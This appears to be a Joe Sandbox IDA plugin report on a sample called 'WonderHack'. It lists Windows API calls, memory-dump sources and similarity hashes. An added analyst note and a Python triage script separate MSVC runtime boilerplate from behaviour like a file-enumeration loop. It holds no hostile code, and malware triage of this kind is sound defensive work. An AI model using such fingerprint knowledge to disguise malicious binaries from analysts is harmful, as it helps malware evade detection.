• Concurrency::cancel_current_task.LIBCPMT ref: 00C9BDD1
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                                                          • Opcode ID: a30ae68e049c7e956b783bb4e37629f1f29edf683a27e5578c88f21e457d13c9
                                                                                                                                                                                                                                                                          • Instruction ID: cbc1cd5bc3b747de00dbc0865f1d3909741aa7e6226be7011322bf38b9188e00
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a30ae68e049c7e956b783bb4e37629f1f29edf683a27e5578c88f21e457d13c9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBE04630C0020CFBCF08EBA8E24949CBBB4AFC1304F1080A9E84967311DB31AE50DB81
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 0487a6129b622234748813b00ba79eb9446b1bf6456a3687a533312a257a8028
• Instruction ID: 3cf86858b043d82cf1798ebdaee94367060b1462a207af5e79ce8ed5bf8a9204
• Opcode Fuzzy Hash: 0487a6129b622234748813b00ba79eb9446b1bf6456a3687a533312a257a8028
• Instruction Fuzzy Hash: D9D22C71E082298FDB65CF28DD40BEAB7B5EB45305F1441EAD41DE7240EB78AE868F41
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,00CB8515,00000002,00000000,?,?,?,00CB8515,?,00000000), ref: 00CB8BDD
• GetLocaleInfoW.KERNEL32(?,20001004,00CB8515,00000002,00000000,?,?,?,00CB8515,?,00000000), ref: 00CB8C06
• GetACP.KERNEL32(?,?,00CB8515,?,00000000), ref: 00CB8C1B
Strings
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: ef6b9f4bfd87e758c2bd17c5ab56939628ada7c8ca52bdd3a315a6479a779681
• Instruction ID: faf7653861c2a496ac936093fa93869a71844ee8317ba9fd9eee69931ca2cfca
• Opcode Fuzzy Hash: ef6b9f4bfd87e758c2bd17c5ab56939628ada7c8ca52bdd3a315a6479a779681
• Instruction Fuzzy Hash: 2721C1A2600100ABDB309F65CD41FD7B7AEAB54B60F5A8425E91ADB140EF32DF48D7A0
APIs
  • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
  • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
• GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00CB84E7
• IsValidCodePage.KERNEL32(00000000), ref: 00CB8525
• IsValidLocale.KERNEL32(?,00000001), ref: 00CB8538
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CB8580
• GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CB859B
Similarity
• API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
• String ID:
• API String ID: 415426439-0
• Opcode ID: c070ba566d72c20ba58d89a86fc0664c18868c46e1c99b04419a460fdd20303f
• Instruction ID: b99c0fa237097d79e73860816f9de7f098cd647b49981b14f21bc84e642e0d35
• Opcode Fuzzy Hash: c070ba566d72c20ba58d89a86fc0664c18868c46e1c99b04419a460fdd20303f
• Instruction Fuzzy Hash: 81513D71A0020AABEF20DFA5CC55BEE77BCBF04700F184469E915E7191EB709A48DF61
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                                                                                                                                                                                          • Instruction ID: b464203d7dff4b04e502f39c5e5a06f138f138258b547fb9cc5fd814208ac05a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12022C71E012199FDF14CFA9D8906EEBBF1FF48314F688269E925E7340D731AA458B90
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00CB9216
• FindNextFileW.KERNEL32(00000000,?), ref: 00CB930A
• FindClose.KERNEL32(00000000), ref: 00CB9349
• FindClose.KERNEL32(00000000), ref: 00CB937C
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID:
• API String ID: 1164774033-0
• Opcode ID: 5b2ba7fe96cab24ef80b5de75492890c0a49ec14c215b6fc0a4264b09d6f79ad
• Instruction ID: 75e286c0016b056d5282005a8cc4744c93568e19d97f06791997b1f398e982ca
• Opcode Fuzzy Hash: 5b2ba7fe96cab24ef80b5de75492890c0a49ec14c215b6fc0a4264b09d6f79ad
• Instruction Fuzzy Hash: C371E175D051696FDF20AF28CC8DBEEBBB8EB05300F1441D9E16D97251DA314E85AF10
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00CA6534
• IsDebuggerPresent.KERNEL32 ref: 00CA6600
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CA6619
• UnhandledExceptionFilter.KERNEL32(?), ref: 00CA6623
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 062cd489bad9b210dbbef8765a7b63c3c5440724ba10357844718a77b912958c
• Instruction ID: f917aabebe963d65f105423dcf8e542169fcfb910e06432ef66f5c6e56b89655
• Opcode Fuzzy Hash: 062cd489bad9b210dbbef8765a7b63c3c5440724ba10357844718a77b912958c
• Instruction Fuzzy Hash: 1431F4B5D012199BDB20DFA4D949BCDBBB8BF08308F1041AAE40DAB250EB709B85DF45
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CA7122
• GetCurrentThreadId.KERNEL32 ref: 00CA7131
• GetCurrentProcessId.KERNEL32 ref: 00CA713A
• QueryPerformanceCounter.KERNEL32(?), ref: 00CA7147
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: a1790c29b5e3d7e8d7edef4305754fd0e03fbbdb4c6f4dbbda43bcf6d76dce65
• Instruction ID: 7ef86b24d32c603e439a2e0d8f35a1baea574934c10aa693b66644d945332d26
• Opcode Fuzzy Hash: a1790c29b5e3d7e8d7edef4305754fd0e03fbbdb4c6f4dbbda43bcf6d76dce65
• Instruction Fuzzy Hash: 68F06274D1120DEBCB00DBB4DA89A9EBBF4EF5C200B9145A5E412F7150EB30AB449B51
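A triage caveat for the three API records above: the FindFirstFileExW/FindNextFileW/FindClose loop is sample logic worth reversing, but the other two records are compiler runtime code present in every /GS-compiled MSVC binary. GetSystemTimeAsFileTime + GetCurrentThreadId + GetCurrentProcessId + QueryPerformanceCounter is the CRT's __security_init_cookie seeding the stack cookie, and IsProcessorFeaturePresent(0x17 = PF_FASTFAIL_AVAILABLE) + IsDebuggerPresent + SetUnhandledExceptionFilter(NULL) + UnhandledExceptionFilter is the CRT's __report_gsfailure/__raise_securityfailure crash path, so the IsDebuggerPresent import in that function is not an anti-debugging check written by the malware author. The script below is an added example, not Joe Sandbox's code: it parses records in the "APIs" format used on this page, keeps "Part of subcall function" lines separate from the function's own calls, and labels each record as CRT boilerplate, a recognised behaviour, or unclassified. The sample text is constructed from the API lines on this page (the GetLocaleInfoW record that follows is included and is deliberately left unclassified); the two CRT fingerprint sets are the call sequences of vcruntime's gs_support.c and gs_report.c.

```python
"""Triage the 'APIs' records of a Joe Sandbox function listing (added example,
not Joe Sandbox code).  CRT fingerprints: MSVC gs_support.c / gs_report.c."""
import re

# Constructed input: the four API records from this part of the listing,
# reduced to the lines the parser consumes.
SAMPLE_REPORT = """\
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00CB9216
• FindNextFileW.KERNEL32(00000000,?), ref: 00CB930A
• FindClose.KERNEL32(00000000), ref: 00CB9349
• FindClose.KERNEL32(00000000), ref: 00CB937C
• API ID: Find$CloseFile$FirstNext
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00CA6534
• IsDebuggerPresent.KERNEL32 ref: 00CA6600
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CA6619
• UnhandledExceptionFilter.KERNEL32(?), ref: 00CA6623
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CA7122
• GetCurrentThreadId.KERNEL32 ref: 00CA7131
• GetCurrentProcessId.KERNEL32 ref: 00CA713A
• QueryPerformanceCounter.KERNEL32(?), ref: 00CA7147
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
APIs
  • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
  • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB871F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB8769
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB882F
• API ID:
"""

# "• [Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Call sets the MSVC runtime emits in every /GS-compiled binary.  A record whose
# own calls cover one of these is compiler code: the IsDebuggerPresent here is the
# CRT crash path (0x17 passed to IsProcessorFeaturePresent is PF_FASTFAIL_AVAILABLE).
CRT_STUBS = {
    "__security_init_cookie (/GS cookie seed)": frozenset({
        "GetSystemTimeAsFileTime", "GetCurrentThreadId",
        "GetCurrentProcessId", "QueryPerformanceCounter"}),
    "__report_gsfailure / __raise_securityfailure": frozenset({
        "IsProcessorFeaturePresent", "IsDebuggerPresent",
        "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}),
}


def parse_records(text):
    """Split the listing into records: {'apis', 'subcalls', 'api_id'}."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"apis": [], "subcalls": [], "api_id": ""}
            records.append(cur)
            continue
        if cur is None:
            continue
        if s.startswith("• API ID:"):
            cur["api_id"] = s.split(":", 1)[1].strip()
            continue
        m = API_LINE.match(line)
        if m:
            entry = {"name": m["name"], "module": m["module"],
                     "args": [a for a in (m["args"] or "").split(",") if a],
                     "ref": int(m["ref"], 16)}
            # Calls attributed to a callee must not shape this function's fingerprint.
            (cur["subcalls"] if m["sub"] else cur["apis"]).append(entry)
    return records


def classify(record):
    """Label a record as CRT boilerplate, a recognised sample behaviour, or unknown."""
    names = {a["name"] for a in record["apis"]}
    for label, fp in CRT_STUBS.items():
        if fp <= names:
            return "crt: " + label
    if "FindNextFileW" in names and names & {"FindFirstFileW", "FindFirstFileExW"}:
        return "sample: directory enumeration loop"
    return "unclassified"


def triage(text):
    """Return (label, lowest ref, highest ref, API ID) per record, in listing order."""
    rows = []
    for rec in parse_records(text):
        refs = [a["ref"] for a in rec["apis"]]
        rows.append((classify(rec), min(refs), max(refs), rec["api_id"]))
    return rows
```

Calling `triage(SAMPLE_REPORT)` yields one row per record, with the two CRT stubs labelled as such and only the Find* loop and the GetLocaleInfoW function left for manual review. Fingerprints are matched as subsets of the function's own calls, so a stub that also calls GetTickCount64 on a newer CRT still matches; subcall lines are parsed but excluded from the match, because Joe Sandbox attributes them to the callee.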
APIs
  • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
  • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB871F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB8769
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB882F
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 661929714-0
                                                                                                                                                                                                                                                                          • Opcode ID: cc44a43f33e038db610b7af5945d0504f3760dd396dc4e5ccf04f0c1352c2dbe
                                                                                                                                                                                                                                                                          • Instruction ID: a93d4160d972e2a4f546d9925ece17d0e9ce5c017c7728a878b4b834f9026356
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc44a43f33e038db610b7af5945d0504f3760dd396dc4e5ccf04f0c1352c2dbe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF61AE71A102179BDF299F28CC82BEA77ACEF04300F544079ED15CA285EB75DA89DB50
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CAF3A8
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CAF3B2
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CAF3BF
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                          • Opcode ID: f29bdab456e5d840266ccc848063c293e10b1fb0bac0b9fe071a19fb60c8a955
                                                                                                                                                                                                                                                                          • Instruction ID: bed48f26b066655d503a05492a09afc0a23f7c33e9c49fb09cd83fab69e72a2d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f29bdab456e5d840266ccc848063c293e10b1fb0bac0b9fe071a19fb60c8a955
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD31D4749012299BCB21DF68D889B8CBBB8BF08314F5041EAE41CA7261EB709B858F54
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CBCCF2,?,?,00000008,?,?,00CC318B,00000000), ref: 00CBCFC4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                          • Opcode ID: bd163b20675e9f246231e231dd38403dc5d7e84d737cedcc182f1ea7e851a5c6
                                                                                                                                                                                                                                                                          • Instruction ID: 203e40939a0b0c40a3fbdf4deecc8016c5fb9c786fb67eeb575ff858501d9ae0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd163b20675e9f246231e231dd38403dc5d7e84d737cedcc182f1ea7e851a5c6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00B14E31510609DFD715CF28C4CABA57BE1FF45364F258698E9AACF2A1C335EA92CB40
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CA61AA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5e7e5de000277987cf2a9569c90ba022715b27cbd3425c24b5fdc7ac125da0c4
                                                                                                                                                                                                                                                                          • Instruction ID: cd4353e8f06b97fd0efe7771f43c263c13a522b386399f7621359742e4ff8288
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7e5de000277987cf2a9569c90ba022715b27cbd3425c24b5fdc7ac125da0c4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53A15EB1A067068FDB59CF58D8917ADBBF1FB49328F29862AD415EB350D334A940CF90
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: d9409afff16be63c33f8bd0a0a282f5813cb2a3c1d29d30e6b13c844ac4f674a
• Instruction ID: adedd0f8b5c8c099b2107bd5d78403fc6bb98abdde64bcd3feca01280bda6f79
• Opcode Fuzzy Hash: d9409afff16be63c33f8bd0a0a282f5813cb2a3c1d29d30e6b13c844ac4f674a
• Instruction Fuzzy Hash: B5C1BB74A00607CECB24CFA8C9C46BEBBB1EF17318F148619D5A2976A2C731AE45DB51
APIs
  • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
  • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB89D1
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 9b94a5421fafc67bc3118c6865034d78750e4705bd04e4e168ad3a2aeccc3f21
• Instruction ID: 9753b15fed18bdb07393f4bea57f13c5369710c942f1f54d20ab208744b12479
• Opcode Fuzzy Hash: 9b94a5421fafc67bc3118c6865034d78750e4705bd04e4e168ad3a2aeccc3f21
• Instruction Fuzzy Hash: 4F218072655646ABDB289A25DC42BFA77ACEF04354F10007AFD06C7241EF74EE48EA50
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
